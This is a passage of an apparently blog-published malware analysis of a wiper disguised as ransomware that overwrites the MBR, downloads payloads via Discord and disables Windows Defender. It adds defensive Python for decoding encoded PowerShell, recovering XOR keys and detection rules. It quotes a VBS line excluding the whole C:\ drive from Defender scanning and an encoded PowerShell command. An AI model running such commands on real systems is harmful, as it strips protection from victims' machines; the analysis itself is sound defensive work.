624px;"><img height="251" src="https://lh6.googleusercontent.com/7hgfqCHnJSQeBBefC4K68Un_LNbdDy7RNjxWrVwMHipbV55MmyjyVNnTXTQiMGbShXtay-KnUcGRlzdrai37IbGM5-IOz816fAty8Rhtq0S85PUHbUNZ3kxWXKgYpcoT_2BcIrO1" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh4pONnoH7TmVaJ2W22MnfFNCyrH43pr0EIqmD-26fcd5EpFMhfjkGscxy5WCkR60H-ZgaDH6S7WuHw8-Iv2f-O0ROYGWjJfeAG3lukfaM88yhmVJ9SUMJO-o9snkbi84rNDJfcHgc4GwU/" style="background-color: transparent; margin-left: 1em; margin-right: 1em; text-align: left;"><img alt="" data-original-height="551" data-original-width="1002" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh4pONnoH7TmVaJ2W22MnfFNCyrH43pr0EIqmD-26fcd5EpFMhfjkGscxy5WCkR60H-ZgaDH6S7WuHw8-Iv2f-O0ROYGWjJfeAG3lukfaM88yhmVJ9SUMJO-o9snkbi84rNDJfcHgc4GwU/s16000/RansomNoteSpraying.png" /></a><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvkAIe2UMIfZ51cwpWmPkZH2JC6eivNTx47nRNs5woKPSOwF9xMMr5HSFmqYXrHZll6_Wpa8XCO1cD345P6Iij3BlHpNnQcnZYcliO4ira9ZoG14Af00upIR88P7NglK1Fp-FbDjwsbfmR/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="32" data-original-width="1096" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvkAIe2UMIfZ51cwpWmPkZH2JC6eivNTx47nRNs5woKPSOwF9xMMr5HSFmqYXrHZll6_Wpa8XCO1cD345P6Iij3BlHpNnQcnZYcliO4ira9ZoG14Af00upIR88P7NglK1Fp-FbDjwsbfmR/s16000/WritingPhysicalDrive0-Monitor.png" /></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Obtaining access to the MBR and rewriting it</span> </div></span><p></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: 
normal; vertical-align: baseline; white-space: pre-wrap;">This behavior is atypical of ransomware, whose main purpose is to encrypt files and demand a ransom for their decryption, usually leaving the system bootable. In this case, the malware overwrites the MBR so that the system cannot start. This means the ransom note is a decoy and the main purpose of the malware is to render systems inoperable.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The traces of stage1.exe execution discovered by CERT-UA are shown below:</span></p><div class="separator" style="clear: both; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhs5KYKJqWmbHbtlKHX4ybPXy3b6HJptrAR3c0MFUOPQMi0cobffOuYVP3Ys8ekAsP_wHKK2CoepDiSEQmZ-y36_BFn4JFpFDnGMJqvjlOOFS-4grDGmeAG0w6x6qdbcENmYsXvd1Ah0EW_hyNDb6xXkYitE_xLHssDEIe5PwRiyrUtgOsEygazDfnUxg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="518" data-original-width="621" src="https://blogger.googleusercontent.com/img/a/AVvXsEhs5KYKJqWmbHbtlKHX4ybPXy3b6HJptrAR3c0MFUOPQMi0cobffOuYVP3Ys8ekAsP_wHKK2CoepDiSEQmZ-y36_BFn4JFpFDnGMJqvjlOOFS-4grDGmeAG0w6x6qdbcENmYsXvd1Ah0EW_hyNDb6xXkYitE_xLHssDEIe5PwRiyrUtgOsEygazDfnUxg=s16000" /></a></span></div><span style="color: #141519; font-family: Arial; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span style="color: black; font-family: 'Times New Roman'; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: 
center; vertical-align: baseline; white-space: normal;"><div><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">stage1.exe execution (source: </em><span style="letter-spacing: 0.32px; text-align: left;"><span face="ProbaPro, sans-serif" style="color: #212529;"><i>https://cert.gov.ua/article/18101</i></span></span><em style="background-color: white; box-sizing: border-box; color: #212529; font-family: ProbaPro, sans-serif; letter-spacing: 0.32px;">)</em></div></span><div style="text-align: center;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></div></span><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Trojan-Downloader (stage2.exe)</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The second file ‘stage2.exe’ is a .NET application that carries a Microsoft Windows signature, apparently copied from the Russian version of Windows Explorer, judging by the properties shown in File Details. 
Also, this file is obfuscated with Eazfuscator.</span></p><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb9XTpAVCHpHTHQ8pru9_Eu0J7H7Z11OjUXIULblfBmrlaUI4cjbBNYllsKRkPyjmjDsYQAnon7zbuTfl0DWnqS2eqQJBS1yh4dgxSSDwPFeOa02x0vwk-6Ts_EVk9mMBJytj3wwq-0y6v/" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img alt="" data-original-height="480" data-original-width="404" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb9XTpAVCHpHTHQ8pru9_Eu0J7H7Z11OjUXIULblfBmrlaUI4cjbBNYllsKRkPyjmjDsYQAnon7zbuTfl0DWnqS2eqQJBS1yh4dgxSSDwPFeOa02x0vwk-6Ts_EVk9mMBJytj3wwq-0y6v/s16000/CertInvalid.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 203px; overflow: hidden; width: 624px;"><img height="203" src="https://lh4.googleusercontent.com/DmFff-qBodjd6u6PSC-ZUnnU-rS51yxTQGfivC1DdBZj5tB8nknvaIZ7svgibTCWbpapQIxuMSAePMUgOzv4FhAOckEKTaWt4DWHncAamvjBbENmAmZ0Bv1SnZHYY5V3qq_2OdoW" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG35IHkTGlYqoj5sxFnwxwgG1AwLRV22Ftg6PEfKdD9PwAr1LD-xHeWGQeT36J7aMrBJ9tPxd6dj9xp9XUBR089Qrkw4pqfsVH6kh2RGzU1tH9YcoYeVd4EGAfpLldVYJrxB5jof9T5ySW/" style="font-size: 11pt; margin-left: 1em; margin-right: 1em; text-align: center;"><img data-original-height="525" data-original-width="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG35IHkTGlYqoj5sxFnwxwgG1AwLRV22Ftg6PEfKdD9PwAr1LD-xHeWGQeT36J7aMrBJ9tPxd6dj9xp9XUBR089Qrkw4pqfsVH6kh2RGzU1tH9YcoYeVd4EGAfpLldVYJrxB5jof9T5ySW/s16000/Explorer_details.png" /></a></p><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; text-align: justify; white-space: pre-wrap;">It’s used to download the <i>File Corrupter</i> and contains a hardcoded Discord link:</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi3h9czJOHtNbsRcZgIvXuUnyEbY2xlSiJ6ogdOZMpUy7mJhIN3QzBHHdnJ3NiefDkCMjzXqqNj7ppWlB_U9EPCanISWmaqRcgzvdvMGFiIbWT5u8XWVzZY4ILUYf3Dj-DlzCaX0PsTCoPHAsASVs2HQxk2UbexjbeC1heZ2fXIXPO0rMn2ZxuiIfUQyA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="327" data-original-width="1271" src="https://blogger.googleusercontent.com/img/a/AVvXsEi3h9czJOHtNbsRcZgIvXuUnyEbY2xlSiJ6ogdOZMpUy7mJhIN3QzBHHdnJ3NiefDkCMjzXqqNj7ppWlB_U9EPCanISWmaqRcgzvdvMGFiIbWT5u8XWVzZY4ILUYf3Dj-DlzCaX0PsTCoPHAsASVs2HQxk2UbexjbeC1heZ2fXIXPO0rMn2ZxuiIfUQyA=s16000" /></a></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSDSCC-LL65i690zQsYwOWQjpWZh51bHsOc_C4eT2LdcWXstVsANduxn0-BkaBJ8OTEO6LzppscyDpywDqU4pnrN0hdSfXNYfm_DFL4_YMnmZc_1x7metKuL3otFHPrRoYWicaYlwp8Uf/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="772" data-original-width="1047" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSDSCC-LL65i690zQsYwOWQjpWZh51bHsOc_C4eT2LdcWXstVsANduxn0-BkaBJ8OTEO6LzppscyDpywDqU4pnrN0hdSfXNYfm_DFL4_YMnmZc_1x7metKuL3otFHPrRoYWicaYlwp8Uf/s16000/discord.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; white-space: pre-wrap;">Downloading data from the hardcoded link</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This file also contains a Base64-encoded command, ‘UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==’, which is passed to PowerShell with the ‘-enc’ parameter. PowerShell therefore decodes this string (Base64 over the UTF-16LE bytes of the script text) before executing it. The decoded command is ‘Start-Sleep -s 10’. 
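</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;">To show the ‘-enc’ mechanics from the detection side, here is an added Python helper, not part of the original analysis, that pulls an encoded command out of a logged PowerShell command line, decodes it the way PowerShell does (Base64 of UTF-16LE text), and re-encodes a script the same way. The command line below is constructed around the Base64 string quoted above; the surrounding switches are assumptions for the example.</span></p>

```python
import base64
import binascii

# Constructed sample command line, built around the Base64 string quoted in
# this post; the other switches are assumptions for the example.
SAMPLE_CMDLINE = (
    "powershell.exe -WindowStyle Hidden -enc "
    "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="
)


def is_encoded_command_switch(token):
    """PowerShell accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...), case-insensitively. Only real prefixes of
    'encodedcommand' qualify, so -ex... (-ExecutionPolicy) does not match."""
    if not token.startswith("-") or len(token) < 2:
        return False
    return "encodedcommand".startswith(token[1:].lower())


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc in a PowerShell command line, or
    None if no such switch is present or the payload is not valid.
    PowerShell expects Base64 over the UTF-16LE bytes of the script."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_command_switch(tok):
            payload = tokens[i + 1]
            # Tolerate stripped '=' padding, which log pipelines sometimes drop.
            payload += "=" * (-len(payload) % 4)
            try:
                raw = base64.b64decode(payload, validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def encode_command(script):
    """Produce the value -enc expects for a script, i.e. what stage2.exe embedded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))  # Start-Sleep -s 10
    # Re-encoding the decoded script reproduces the string quoted in the post.
    print(encode_command("Start-Sleep -s 10") == SAMPLE_CMDLINE.split()[-1])  # True
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">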
This command suspends execution for the specified period and is used in conjunction with the C2 server connection.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 123px; overflow: hidden; width: 600px;"><img height="123" src="https://lh3.googleusercontent.com/2ilelGyqMaxTGYok0HbUwuFtsjEoU12EqEiSkgDSDN7ujiA-S5nefbRHv-bjGiF2FtzKdj8u4WpYIwZuSiXcdJ-mhjcVqe8G9R_WQRzj_XQXZSZpVh1ZO4JKVzXfx0up_ffGrgZL" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 105px; overflow: hidden; width: 576px;"><img height="105" src="https://lh5.googleusercontent.com/DRToS5ZA7ov2UZJW3j6ONWvpGjX2aonO3Jaw4jYu1j_YyHmslijtg_D5dDmMwRZk9mBjJRMRNZ8Xz33pqFdciUETrne5gaokHJaheGOCpHsEYv-QvqZ4pGfLQF-XJKXCgMYIfRWi" style="margin-left: 0px; margin-top: 0px;" width="576" /></span></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Executing the encoded PowerShell command</span></p><h3 dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: 
justify;"><span style="background-color: transparent; color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">File Corrupter (Tbopbh.jpg / Frkmlkdkdubkznbkmcf.dll)</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The downloaded Tbopbh.jpg file is a picture that will be decoded into Frkmlkdkdubkznbkmcf.dll (SHA256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6). This file is a .NET library and contains 3 resources:</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 124px; overflow: hidden; width: 320px;"><img height="137.55853780120657" src="https://lh3.googleusercontent.com/2mTrDY36bRpvY3AFndanS5kNvy0Dthq1MaPf4aoUpejB6QwuIh2BRBEDGn6Qgt3spPOboqbAWs9VyUu-g2JpljzUMISTIMLbq1766PoXgu7E0AXe8-O7OXOLF6e1B9WOyMu8aIRl" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Frkmlkdkdubkznbkmcf.dll loads the resource ‘78c855a088924e92a7f60d661c3d1845’ and calls the decryption function.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; 
font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 191px; overflow: hidden; width: 624px;"><img height="191" src="https://lh5.googleusercontent.com/QjaY1DQPv8Gb7081C_zXcWoeVu7Cz5wp-jThllssFjlKOq9bUWpfXexu52ziYCToqALJLNoXkUZ7TiuxPe9u-yZJFWyRwqPWMdASLwfA2WLtvnZ30WjQ33NrF4LHagXuAdDcziye" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Resource loading </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decryption function will decode this resource using the XOR operation. 
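</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The post does not give the XOR key, and a short repeating key is the usual case for this kind of .NET dropper. As an added example (not code from the post), the following Python recovers such a key from the first bytes of the decrypted resource, assuming the resource is a PE file whose DOS header serves as known plaintext; the sample blob and the 5-byte key are constructed for the demonstration and the decoder is not told the key.</span></p>

```python
"""Recovering a repeating XOR key from an encrypted resource by known
plaintext. Added example, not code from the post, which names neither the
key nor its length. Assumptions (labelled): the decoded resource is a PE file,
so its first bytes are the standard DOS header, and the key is a short
repeating byte sequence, which is the common case for .NET droppers."""

# Known plaintext: first 16 bytes of the usual Microsoft-linker DOS header.
PE_HEADER_PREFIX = bytes.fromhex("4d5a90000300000004000000ffff0000")


def xor_bytes(data, key):
    """XOR `data` against a repeating `key`; the same call decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_repeating_key(ciphertext, known_plaintext, max_key_len=16):
    """Return the shortest key (period) that explains the known-plaintext
    prefix, or None. At least two full repetitions must be visible inside
    the known prefix, otherwise a period cannot be confirmed."""
    n = min(len(ciphertext), len(known_plaintext))
    # Key stream for the known prefix: ciphertext XOR plaintext, byte by byte.
    stream = xor_bytes(ciphertext[:n], known_plaintext[:n])
    for period in range(1, min(max_key_len, n // 2) + 1):
        candidate = stream[:period]
        if all(stream[i] == candidate[i % period] for i in range(n)):
            return candidate
    return None


def decode_resource(ciphertext, known_plaintext=PE_HEADER_PREFIX, max_key_len=16):
    """Recover the key from the expected header and decode the whole blob.
    Returns (key, plaintext), or (None, None) when no short period fits."""
    key = recover_repeating_key(ciphertext, known_plaintext, max_key_len)
    if key is None:
        return None, None
    return key, xor_bytes(ciphertext, key)


def demo():
    """Constructed sample: a PE-like blob encrypted with a 5-byte key the
    decoder is not told about. Returns the recovered key and whether the
    decoded output equals the original."""
    fake_pe = PE_HEADER_PREFIX + b"\xb8\x00\x00\x00" + b"\x00" * 44 + b"PE\x00\x00"
    secret_key = b"\x31\x7f\x0c\xa5\x9e"  # constructed; unknown to decode_resource
    encrypted = xor_bytes(fake_pe, secret_key)
    key, decoded = decode_resource(encrypted)
    return key, decoded == fake_pe


if __name__ == "__main__":
    key, ok = demo()
    print("recovered key:", key.hex() if key else None, "decoded correctly:", ok)
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Because the DOS header contains long runs of zero bytes, the key stream is visible directly in the ciphertext at those offsets; the period check is what turns that key stream into an actual key. If the real resource is not a PE file, swap PE_HEADER_PREFIX for whatever header the decoded payload is expected to start with.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">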
</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 384px; overflow: hidden; width: 624px;"><img height="384" src="https://lh5.googleusercontent.com/V6nYMghQzpt1Bwy81_CDEO-sHZW5umz7tVklKL63NGfPN-zoX1EYCOfpsxjXPvXjBTaAnng5JDmcFc4vMhQbjLJW6-dWrvNLxc5EsxLy6DS-zlx_DD00bfVbVcOmSj-NLfXkJyoa" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Decoding resource</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During execution, the decoded resource drops two additional files into the %Temp% folder. The first file is ‘AdvancedRun.exe’, which disables Windows Defender by executing the second file, ‘Nmddfrqqrbyjeygggda.vbs’. 
This script contains a command that excludes the whole ‘C:\’ drive from Windows Defender scanning:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False</span></blockquote><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Next, the malware drops ‘InstallUtil.exe’ into the ‘%Temp%’ folder and executes it. 
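</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">As an added example (not code from the post, and not tied to any EDR product), the following Python runs simple detection rules over constructed process-creation records that mirror the behaviours described so far: a PowerShell -enc argument (decoded as Base64 of UTF-16LE, which is what PowerShell expects), a script host launching PowerShell, a Set-MpPreference exclusion covering a whole drive, and InstallUtil.exe executed from a Temp directory. The parent images and file paths are assumptions; the command lines are the ones quoted in this analysis.</span></p>

```python
"""Detection rules for the stage-2 behaviours described above, run over
constructed process-creation records. Added example: not code from the post
and not tied to any EDR or SIEM. The command lines are the ones the analysis
quotes; parent images and file paths are assumptions for the demonstration."""
import base64
import re

# (parent image, child command line). The last two are benign controls.
SAMPLE_EVENTS = [
    ("stage2.exe",
     "powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="),
    ("wscript.exe",
     "powershell Set-MpPreference -ExclusionPath 'C:\\'"),
    ("AdvancedRun.exe",
     "C:\\Users\\victim\\AppData\\Local\\Temp\\InstallUtil.exe"),
    ("explorer.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Date"),
    ("explorer.exe",
     "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /i svc.exe"),
]

# Matches -e, -ec, -enc, -EncodedCommand and the other prefixes PowerShell
# accepts for EncodedCommand, followed by the Base64 argument.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None.
    PowerShell expects Base64 of UTF-16LE text, so the bytes must be decoded
    as UTF-16LE; decoding them as UTF-8 would leave NUL bytes between the
    characters and defeat any keyword matching on the result."""
    m = ENCODED_ARG.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(parent, cmdline):
    """Return the names of the rules an event matches, in a fixed order."""
    hits = []
    decoded = decode_encoded_command(cmdline)
    # Match on the visible command line plus the decoded payload, if any.
    visible = cmdline if decoded is None else cmdline + " " + decoded
    low = visible.lower()
    if decoded is not None:
        hits.append("powershell_encoded_command")
    if parent.lower() in ("wscript.exe", "cscript.exe") and "powershell" in low:
        hits.append("script_host_spawned_powershell")
    if "set-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion_added")
        # A bare drive root such as C:\ switches Defender off for the whole volume.
        if re.search(r"-exclusionpath\s+['\"]?[a-z]:\\['\"]?(?:\s|$)", low):
            hits.append("defender_exclusion_whole_drive")
    if re.search(r"\\temp\\installutil\.exe", low):
        hits.append("installutil_run_from_temp")
    return hits


def triage_events(events):
    """Apply triage_event to every (parent, cmdline) pair, preserving order."""
    return [triage_event(parent, cmd) for parent, cmd in events]


if __name__ == "__main__":
    for (parent, cmd), hits in zip(SAMPLE_EVENTS, triage_events(SAMPLE_EVENTS)):
        print(f"{parent:16} {hits if hits else '-'}")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            print(f"{'':16} decoded: {decoded!r}")
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The two control events show why the rules key on context rather than on the binary name alone: InstallUtil.exe from its Framework directory is routine, while the same file name under a Temp directory is the pattern this sample uses.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">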
InstallUtil.exe is the legitimate Microsoft utility for installing server resources and carries a valid digital signature.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 246px;"><img height="332" src="https://lh3.googleusercontent.com/3sEJz8n2yMOR7A7V8zwbo3YqCS9o52Pxf7skuqJLP_oYXZ2pFTtt-px-17t7KmpC_vT1anqrvMPE7hxaa7ap1O1lishftiu-Tg3xnE2QjtXLsMcmRzDAQLiglCd8zk2uUrY2EaqE" style="margin-left: 0px; margin-top: 0px;" width="246" /></span></span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 276px;"><img height="332" src="https://lh3.googleusercontent.com/FBk-_DdNnzSuiTl6qHc8v-sKYKqOW62pw0sqwLgkp9MQKEepKsecEo9KZNXMlnR26gmRUzeqmg2PwncHvYtrDWtA42EuqT5rFrtn7W75BO_fM5puqxzBW0hGQPHFAJskvyTQLqK1" style="margin-left: 0px; margin-top: 0px;" width="276" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: 